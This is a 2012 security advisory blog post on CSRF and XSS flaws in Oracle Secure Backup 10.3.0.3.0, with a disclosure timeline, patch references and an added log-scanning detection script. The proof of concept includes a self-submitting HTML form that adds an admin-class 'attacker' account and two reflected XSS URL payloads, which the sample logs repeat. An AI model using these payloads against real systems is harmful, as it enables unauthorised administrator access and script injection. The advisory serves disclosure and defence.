Saturday, April 28, 2012

Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Description
Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of files on a file system. The software can also serve as a media management layer for Recovery Manager through the SBT interface.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in Oracle Secure Backup. These issues were discovered in a default installation of Oracle Secure Backup 10.3.0.3.0. Other earlier versions may also be affected.


Proof of concept
Cross-Site Request Forgery (CSRF)
==========================

<html>
<body>
<form action="https://[target]/index.php" id="csrf" method="post">
<input type="hidden" name="process" value="1" />
<input type="hidden" name="tab" value="2" />
<input type="hidden" name="mode" value="2" />
<input type="hidden" name="button" value="Ok" />
<input type="hidden" name="screen" value="d" />
<input type="hidden" name="selector%5B%5D" value="" />
<input type="hidden" name="changeobject" value="attacker" />
<input type="hidden" name="upassword" value="passwd123" />
<input type="hidden" name="vpassword" value="passwd123" />
<input type="hidden" name="oclass" value="admin" />
<input type="hidden" name="uclass" value="" />
<input type="hidden" name="givenname" value="" />
<input type="hidden" name="unixname" value="" />
<input type="hidden" name="unixgroup" value="" />
<input type="hidden" name="ndmpserveruser" value="no" />
<input type="hidden" name="emailaddress" value="" />
<input type="hidden" name="op" value="Add" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================

  • https://[target]/login.php?clear=yes&tab='%20stYle='x:expre/**/ssion(alert(1))%20&mode=3
  • https://[target]/login.php?clear=yes&tab=3&mode='%20stYle='x:expre/**/ssion(alert(1))
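A log check for the two request shapes shown above, as an added example that is not part of the original advisory or Oracle's code. It assumes a web access log in "combined" format with the Referer recorded, a hypothetical server name `osb.example.test`, and that legitimate `tab` and `mode` values are small integers, as in the advisory's own requests.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format: client, request line, status, size, Referer.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "([^"]*)"')
INT_RE = re.compile(r'\d{1,3}')

def classify(line, server_host):
    """Return findings for one access-log line (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, method, target, referer = m.groups()
    url = urlsplit(target)
    findings = []
    if url.path == "/login.php":
        # Assumption: legitimate tab/mode values are small integers.
        params = parse_qs(url.query, keep_blank_values=True)
        for name in ("tab", "mode"):
            for value in params.get(name, []):
                if not INT_RE.fullmatch(value):
                    findings.append((client, "non-numeric " + name, value))
    if url.path == "/index.php" and method == "POST":
        # A state-changing POST whose Referer names another host is the
        # CSRF shape; "-" (no Referer) is left alone to limit noise.
        ref_host = urlsplit(referer).hostname
        if ref_host and ref_host != server_host:
            findings.append((client, "cross-site POST", ref_host))
    return findings

# Constructed sample lines (documentation addresses, hypothetical hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [28/Apr/2012:10:00:00 +0000] "GET /login.php?clear=yes&tab=3&mode=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [28/Apr/2012:10:01:00 +0000] "GET /login.php?clear=yes&tab=3&mode='%20stYle='x:expre/**/ssion(alert(1)) HTTP/1.1" 200 5300 "-" "Mozilla/4.0"
192.0.2.12 - - [28/Apr/2012:10:02:00 +0000] "POST /index.php HTTP/1.1" 200 812 "https://osb.example.test/index.php" "Mozilla/5.0"
192.0.2.12 - - [28/Apr/2012:10:03:00 +0000] "POST /index.php HTTP/1.1" 200 812 "http://other.example.net/page.html" "Mozilla/5.0"
""".splitlines()

def scan(lines, server_host="osb.example.test"):
    """Run classify() over every line and collect all findings."""
    return [f for line in lines for f in classify(line, server_host)]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs do not record POST bodies, so the second check keys on the Referer alone; a hit is a lead for reviewing the user list for unexpected `admin`-class accounts.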


Solution
Oracle has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html
Secunia: http://secunia.com/advisories/43011/

Disclosure Timeline
2011-01-21 - Vulnerabilities discovered.
2011-01-21 - Vulnerabilities reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-07-19 - Patch released.
2011-07-20 - Advisory published by Secunia.
